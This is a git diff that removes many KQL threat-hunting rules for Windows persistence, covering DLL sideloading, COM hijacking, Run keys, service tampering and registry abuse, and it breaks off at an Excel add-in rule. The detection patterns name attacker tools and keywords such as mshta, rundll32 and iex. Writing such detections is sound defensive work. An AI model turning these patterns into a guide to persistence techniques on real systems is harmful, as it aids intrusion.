-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/17
-// Level: medium
-// Description: Detects PowerShell creating a binary executable or a script file.
-// Tags: attack.persistence
-DeviceFileEvents
-| where ((InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".chm" or FolderPath endswith ".cmd" or FolderPath endswith ".com" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".jar" or FolderPath endswith ".js" or FolderPath endswith ".ocx" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf")) and (not((((FolderPath endswith ".dll" or FolderPath endswith ".exe") and FolderPath startswith "C:\\Windows\\Temp\\") or (FolderPath contains "\\AppData\\Local\\Temp\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe") and FolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/Persistence/Potential_CCleanerDU.DLL_Sideloading.kql b/Persistence/Potential_CCleanerDU.DLL_Sideloading.kql
deleted file mode 100644
index 1c5d0f3d..00000000
--- a/Persistence/Potential_CCleanerDU.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/07/13
-// Level: medium
-// Description: Detects potential DLL sideloading of "CCleanerDU.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\CCleanerDU.dll" and (not(((InitiatingProcessFolderPath endswith "\\CCleaner.exe" or InitiatingProcessFolderPath endswith "\\CCleaner64.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\"))))
\ No newline at end of file
diff --git a/Persistence/Potential_CCleanerReactivator.DLL_Sideloading.kql b/Persistence/Potential_CCleanerReactivator.DLL_Sideloading.kql
deleted file mode 100644
index 7d335d90..00000000
--- a/Persistence/Potential_CCleanerReactivator.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior
-// Date: 2023/07/13
-// Level: medium
-// Description: Detects potential DLL sideloading of "CCleanerReactivator.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\CCleanerReactivator.dll" and (not((InitiatingProcessFolderPath endswith "\\CCleanerReactivator.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\"))))
\ No newline at end of file
diff --git a/Persistence/Potential_COM_Object_Hijacking_Via_TreatAs_Subkey_-_Registry.kql b/Persistence/Potential_COM_Object_Hijacking_Via_TreatAs_Subkey_-_Registry.kql
deleted file mode 100644
index c814590c..00000000
--- a/Persistence/Potential_COM_Object_Hijacking_Via_TreatAs_Subkey_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kutepov Anton, oscd.community
-// Date: 2019/10/23
-// Level: medium
-// Description: Detects COM object hijacking via TreatAs subkey
-// Tags: attack.persistence, attack.t1546.015
-DeviceRegistryEvents
-| where (ActionType =~ "RegistryKeyCreated" and (RegistryKey contains "HKU" and RegistryKey contains "Classes\\CLSID" and RegistryKey contains "\\TreatAs")) and (not(InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\svchost.exe"))
\ No newline at end of file
diff --git a/Persistence/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql b/Persistence/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql
deleted file mode 100644
index 4ca5d408..00000000
--- a/Persistence/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: medium
-// Description: Detects potential DLL sideloading of "chrome_frame_helper.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\chrome_frame_helper.dll" and (not((FolderPath startswith "C:\\Program Files\\Google\\Chrome\\Application\\" or FolderPath startswith "C:\\Program Files (x86)\\Google\\Chrome\\Application\\"))) and (not(FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\"))
\ No newline at end of file
diff --git a/Persistence/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql b/Persistence/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql
deleted file mode 100644
index 7d53df8f..00000000
--- a/Persistence/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/10/25
-// Level: medium
-// Description: Detects DLL sideloading of "dbgcore.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\dbgcore.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(FolderPath endswith "\\Steam\\bin\\cef\\cef.win7x64\\dbgcore.dll"))
\ No newline at end of file
diff --git a/Persistence/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql b/Persistence/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql
deleted file mode 100644
index 85e52e34..00000000
--- a/Persistence/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/10/25
-// Level: medium
-// Description: Detects DLL sideloading of "dbghelp.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\dbghelp.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(((FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\amd64\\dbghelp.dll" or FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\i386\\dbghelp.dll") or (FolderPath endswith "\\Epic Games\\Launcher\\Engine\\Binaries\\ThirdParty\\DbgHelp\\dbghelp.dll" or FolderPath endswith "\\Epic Games\\MagicLegends\\x86\\dbghelp.dll"))))
\ No newline at end of file
diff --git a/Persistence/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql b/Persistence/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql
deleted file mode 100644
index bafb67b9..00000000
--- a/Persistence/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/05
-// Level: medium
-// Description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\libcurl.dll" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\GUP.exe"))
\ No newline at end of file
diff --git a/Persistence/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql b/Persistence/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql
deleted file mode 100644
index d6f4a3c3..00000000
--- a/Persistence/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/13
-// Level: medium
-// Description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ClassicExplorer32.dll" and (not(FolderPath startswith "C:\\Program Files\\Classic Shell\\"))
\ No newline at end of file
diff --git a/Persistence/Potential_DLL_Sideloading_Via_JsSchHlp.kql b/Persistence/Potential_DLL_Sideloading_Via_JsSchHlp.kql
deleted file mode 100644
index 4d8a43ae..00000000
--- a/Persistence/Potential_DLL_Sideloading_Via_JsSchHlp.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/14
-// Level: medium
-// Description: Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\JSESPR.dll" and (not(FolderPath startswith "C:\\Program Files\\Common Files\\Justsystem\\JsSchHlp\\"))
\ No newline at end of file
diff --git a/Persistence/Potential_DLL_Sideloading_Via_comctl32.dll.kql b/Persistence/Potential_DLL_Sideloading_Via_comctl32.dll.kql
deleted file mode 100644
index 05e33118..00000000
--- a/Persistence/Potential_DLL_Sideloading_Via_comctl32.dll.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)
-// Date: 2022/12/16
-// Level: high
-// Description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local\\" or FolderPath startswith "C:\\windows\\system32\\wermgr.exe.local\\")
\ No newline at end of file
diff --git a/Persistence/Potential_Libvlc.DLL_Sideloading.kql b/Persistence/Potential_Libvlc.DLL_Sideloading.kql
deleted file mode 100644
index 3fce189b..00000000
--- a/Persistence/Potential_Libvlc.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior
-// Date: 2023/04/17
-// Level: medium
-// Description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\libvlc.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\VideoLAN\\VLC\\" or FolderPath startswith "C:\\Program Files\\VideoLAN\\VLC\\")))
\ No newline at end of file
diff --git a/Persistence/Potential_PSFactoryBuffer_COM_Hijacking.kql b/Persistence/Potential_PSFactoryBuffer_COM_Hijacking.kql
deleted file mode 100644
index ac641f11..00000000
--- a/Persistence/Potential_PSFactoryBuffer_COM_Hijacking.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: BlackBerry Threat Research and Intelligence Team - @Joseliyo_Jstnk
-// Date: 2023/06/07
-// Level: high
-// Description: Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL.
-// Tags: attack.persistence, attack.t1546.015
-DeviceRegistryEvents
-| where RegistryKey endswith "\\CLSID\\{c90250f3-4d7d-4991-9b69-a5c5bc1c2ae6}\\InProcServer32\\(Default)" and (not((RegistryValueData in~ ("%windir%\\System32\\ActXPrxy.dll", "C:\\Windows\\System32\\ActXPrxy.dll"))))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Attempt_Via_ErrorHandler.Cmd.kql b/Persistence/Potential_Persistence_Attempt_Via_ErrorHandler.Cmd.kql
deleted file mode 100644
index 959bd914..00000000
--- a/Persistence/Potential_Persistence_Attempt_Via_ErrorHandler.Cmd.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/09
-// Level: medium
-// Description: Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence
-The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.
-
-// Tags: attack.persistence
-DeviceFileEvents
-| where FolderPath endswith "\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Attempt_Via_Existing_Service_Tampering.kql b/Persistence/Potential_Persistence_Attempt_Via_Existing_Service_Tampering.kql
deleted file mode 100644
index bfd40122..00000000
--- a/Persistence/Potential_Persistence_Attempt_Via_Existing_Service_Tampering.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sreeman
-// Date: 2020/09/29
-// Level: medium
-// Description: Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.
-// Tags: attack.persistence, attack.t1543.003, attack.t1574.011
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "sc " and ProcessCommandLine contains "config " and ProcessCommandLine contains "binpath=") or (ProcessCommandLine contains "sc " and ProcessCommandLine contains "failure" and ProcessCommandLine contains "command=")) or ((ProcessCommandLine contains ".sh" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bin$" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".msh$" or ProcessCommandLine contains ".reg$" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".jar" or ProcessCommandLine contains ".pl") and ((ProcessCommandLine contains "reg " and ProcessCommandLine contains "add " and ProcessCommandLine contains "FailureCommand") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains "add " and ProcessCommandLine contains "ImagePath")))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Attempt_Via_Run_Keys_Using_Reg.EXE.kql b/Persistence/Potential_Persistence_Attempt_Via_Run_Keys_Using_Reg.EXE.kql
deleted file mode 100644
index a1a02521..00000000
--- a/Persistence/Potential_Persistence_Attempt_Via_Run_Keys_Using_Reg.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/06/28
-// Level: medium
-// Description: Detects suspicious command line reg.exe tool adding key to RUN key in Registry
-// Tags: attack.persistence, attack.t1547.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "reg" and ProcessCommandLine contains " ADD " and ProcessCommandLine contains "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Using_DebugPath.kql b/Persistence/Potential_Persistence_Using_DebugPath.kql
deleted file mode 100644
index 0a216f80..00000000
--- a/Persistence/Potential_Persistence_Using_DebugPath.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/07/27
-// Level: medium
-// Description: Detects potential persistence using Appx DebugPath
-// Tags: attack.persistence, attack.t1546.015
-DeviceRegistryEvents
-| where (RegistryKey contains "Classes\\ActivatableClasses\\Package\\Microsoft." and RegistryKey endswith "\\DebugPath") or (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft." and RegistryKey endswith "\\(Default)")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_AppCompat_RegisterAppRestart_Layer.kql b/Persistence/Potential_Persistence_Via_AppCompat_RegisterAppRestart_Layer.kql
deleted file mode 100644
index 28f8a0f1..00000000
--- a/Persistence/Potential_Persistence_Via_AppCompat_RegisterAppRestart_Layer.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/01/01
-// Level: medium
-// Description: Detects the setting of the REGISTERAPPRESTART compatibility layer on an application.
-This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API.
-This can be potentially abused as a persistence mechanism.
-
-// Tags: attack.persistence, attack.t1546.011
-DeviceRegistryEvents
-| where RegistryValueData contains "REGISTERAPPRESTART" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Layers"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_App_Paths_Default_Property.kql b/Persistence/Potential_Persistence_Via_App_Paths_Default_Property.kql
deleted file mode 100644
index 33dfb797..00000000
--- a/Persistence/Potential_Persistence_Via_App_Paths_Default_Property.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/10
-// Level: high
-// Description: Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence
-The entries found under App Paths are used primarily for the following purposes.
-First, to map an application's executable file name to that file's fully qualified path.
-Second, to prepend information to the PATH environment variable on a per-application, per-process basis.
-
-// Tags: attack.persistence, attack.t1546.012
-DeviceRegistryEvents
-| where (RegistryValueData contains "\\Users\\Public" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Windows\\Temp\\" or RegistryValueData contains "\\Desktop\\" or RegistryValueData contains "\\Downloads\\" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%" or RegistryValueData contains "iex" or RegistryValueData contains "Invoke-" or RegistryValueData contains "rundll32" or RegistryValueData contains "regsvr32" or RegistryValueData contains "mshta" or RegistryValueData contains "cscript" or RegistryValueData contains "wscript" or RegistryValueData contains ".bat" or RegistryValueData contains ".hta" or RegistryValueData contains ".dll" or RegistryValueData contains ".ps1") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths" and (RegistryKey endswith "(Default)" or RegistryKey endswith "Path")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_AutodialDLL.kql b/Persistence/Potential_Persistence_Via_AutodialDLL.kql
deleted file mode 100644
index bea17672..00000000
--- a/Persistence/Potential_Persistence_Via_AutodialDLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/10
-// Level: high
-// Description: Detects change the the "AutodialDLL" key which could be used as a persistence method to load custom DLL via the "ws2_32" library
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\Services\\WinSock2\\Parameters\\AutodialDLL"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_CHM_Helper_DLL.kql b/Persistence/Potential_Persistence_Via_CHM_Helper_DLL.kql
deleted file mode 100644
index f0cfbb39..00000000
--- a/Persistence/Potential_Persistence_Via_CHM_Helper_DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: high
-// Description: Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\Software\\Microsoft\\HtmlHelp Author\\Location" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\HtmlHelp Author\\Location"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_COM_Hijacking_From_Suspicious_Locations.kql b/Persistence/Potential_Persistence_Via_COM_Hijacking_From_Suspicious_Locations.kql
deleted file mode 100644
index b6360528..00000000
--- a/Persistence/Potential_Persistence_Via_COM_Hijacking_From_Suspicious_Locations.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/28
-// Level: high
-// Description: Detects potential COM object hijacking where the "Server" (In/Out) is pointing to a suspicious or unsuale location
-// Tags: attack.persistence, attack.t1546.015
-DeviceRegistryEvents
-| where (RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Desktop\\" or RegistryValueData contains "\\Downloads\\" or RegistryValueData contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or RegistryValueData contains "\\System32\\spool\\drivers\\color\\" or RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Windows\\Temp\\" or RegistryValueData contains "%appdata%" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%") and RegistryKey contains "\\CLSID" and (RegistryKey endswith "\\InprocServer32\\(Default)" or RegistryKey endswith "\\LocalServer32\\(Default)")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_COM_Search_Order_Hijacking.kql b/Persistence/Potential_Persistence_Via_COM_Search_Order_Hijacking.kql
deleted file mode 100644
index b9526492..00000000
--- a/Persistence/Potential_Persistence_Via_COM_Search_Order_Hijacking.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien
-// Date: 2020/04/14
-// Level: medium
-// Description: Detects potential COM object hijacking leveraging the COM Search Order
-// Tags: attack.persistence, attack.t1546.015
-DeviceRegistryEvents
-| where (RegistryKey contains "\\CLSID" and RegistryKey endswith "\\InprocServer32\\(Default)") and (not(((RegistryValueData endswith ":\\Windows\\system32\\dnssdX.dll" or RegistryValueData endswith ":\\Windows\\SysWOW64\\dnssdX.dll") or ((InitiatingProcessFolderPath contains ":\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Windows Defender\\") and InitiatingProcessFolderPath endswith "\\MsMpEng.exe") or (RegistryValueData contains "\\AppData\\Roaming\\Dropbox\\" and (RegistryValueData contains "\\DropboxExt64." and RegistryValueData contains ".dll")) or InitiatingProcessFolderPath endswith ":\\WINDOWS\\SYSTEM32\\dxdiag.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdgeUpdateComRegisterShell64.exe" or RegistryValueData contains ":\\WINDOWS\\system32\\GamingServicesProxy.dll" or (RegistryValueData contains "%%systemroot%%\\system32\\" or RegistryValueData contains "%%systemroot%%\\SysWow64\\") or InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\SecurityHealthService.exe" or ((InitiatingProcessFolderPath endswith ":\\Windows\\System32\\poqexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\regsvr32.exe") and RegistryKey endswith "\\InProcServer32\\(Default)") or RegistryValueData contains "\\FileRepository\\nvmdi.inf" or (RegistryValueData contains "\\AppData\\Local\\Microsoft\\OneDrive\\" or RegistryValueData contains "\\FileCoAuthLib64.dll" or RegistryValueData contains "\\FileSyncShell64.dll" or RegistryValueData contains "\\FileSyncApi64.dll") or (RegistryValueData contains ":\\Windows\\System32\\Autopilot.dll" and InitiatingProcessFolderPath endswith ":\\Windows\\System32\\poqexec.exe") or RegistryValueData endswith ":\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll" or RegistryValueData contains ":\\ProgramData\\Microsoft\\" or (RegistryValueData contains ":\\Program Files\\" or RegistryValueData contains ":\\Program Files (x86)\\") or (RegistryValueData endswith ":\\Windows\\pyshellext.amd64.dll" or RegistryValueData endswith ":\\Windows\\pyshellext.dll") or (RegistryValueData contains ":\\Windows\\System32\\SecurityHealth" and InitiatingProcessFolderPath endswith ":\\Windows\\system32\\SecurityHealthService.exe") or (RegistryValueData contains "\\AppData\\Local\\Microsoft\\TeamsMeetingAddin\\" and RegistryValueData contains "\\Microsoft.Teams.AddinLoader.dll") or RegistryValueData endswith "TmopIEPlg.dll" or (InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\wuauclt.exe" or InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\svchost.exe"))))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_DLLPathOverride.kql b/Persistence/Potential_Persistence_Via_DLLPathOverride.kql
deleted file mode 100644
index df77155d..00000000
--- a/Persistence/Potential_Persistence_Via_DLLPathOverride.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: high
-// Description: Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" process
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Control\\ContentIndex\\Language" and (RegistryKey contains "\\StemmerDLLPathOverride" or RegistryKey contains "\\WBDLLPathOverride" or RegistryKey contains "\\StemmerClass" or RegistryKey contains "\\WBreakerClass")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Disk_Cleanup_Handler_-_Registry.kql b/Persistence/Potential_Persistence_Via_Disk_Cleanup_Handler_-_Registry.kql
deleted file mode 100644
index 5d4ed302..00000000
--- a/Persistence/Potential_Persistence_Via_Disk_Cleanup_Handler_-_Registry.kql
+++ /dev/null
@@ -1,13 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: medium
-// Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.
-The disk cleanup manager is part of the operating system. It displays the dialog box […]
-The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.
-Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.
-Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.
-Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
-
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where (ActionType =~ "RegistryKeyCreated" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches") and (not((RegistryKey endswith "\\Active Setup Temp Folders" or RegistryKey endswith "\\BranchCache" or RegistryKey endswith "\\Content Indexer Cleaner" or RegistryKey endswith "\\D3D Shader Cache" or RegistryKey endswith "\\Delivery Optimization Files" or RegistryKey endswith "\\Device Driver Packages" or RegistryKey endswith "\\Diagnostic Data Viewer database files" or RegistryKey endswith "\\Downloaded Program Files" or RegistryKey endswith "\\DownloadsFolder" or RegistryKey endswith "\\Feedback Hub Archive log files" or RegistryKey endswith "\\Internet Cache Files" or RegistryKey endswith "\\Language Pack" or RegistryKey endswith "\\Microsoft Office Temp Files" or RegistryKey endswith "\\Offline Pages Files" or RegistryKey endswith "\\Old ChkDsk Files" or RegistryKey endswith "\\Previous Installations" or RegistryKey endswith "\\Recycle Bin" or RegistryKey endswith "\\RetailDemo Offline Content" or RegistryKey endswith "\\Setup Log Files" or RegistryKey endswith "\\System error memory dump files" or RegistryKey endswith "\\System error minidump files" or RegistryKey endswith "\\Temporary Files" or RegistryKey endswith "\\Temporary Setup Files" or RegistryKey endswith "\\Temporary Sync Files" or RegistryKey endswith "\\Thumbnail Cache" or RegistryKey endswith "\\Update Cleanup" or RegistryKey endswith "\\Upgrade Discarded Files" or RegistryKey endswith "\\User file versions" or RegistryKey endswith "\\Windows Defender" or RegistryKey endswith "\\Windows Error Reporting Files" or RegistryKey endswith "\\Windows ESD installation files" or RegistryKey endswith "\\Windows Upgrade Log Files")))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Event_Viewer_Events.asp.kql b/Persistence/Potential_Persistence_Via_Event_Viewer_Events.asp.kql
deleted file mode 100644
index 617d3ee9..00000000
--- a/Persistence/Potential_Persistence_Via_Event_Viewer_Events.asp.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/17
-// Level: medium
-// Description: Detects potential registry persistence technique using the Event Viewer "Events.asp" technique
-// Tags: attack.persistence, attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionURL") and (not((RegistryValueData =~ "(Empty)" or (RegistryValueData =~ "%%SystemRoot%%\\PCHealth\\HelpCtr\\Binaries\\HelpCtr.exe" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram") or (RegistryValueData =~ "-url hcp://services/centers/support*topic=%%s" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgramCommandLineParameters") or RegistryValueData =~ "http://go.microsoft.com/fwlink/events.asp")))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Excel_Add-in_-_Registry.kql b/Persistence/Potential_Persistence_Via_Excel_Add-in_-_Registry.kql
deleted file mode 100644
index 4548866a..00000000
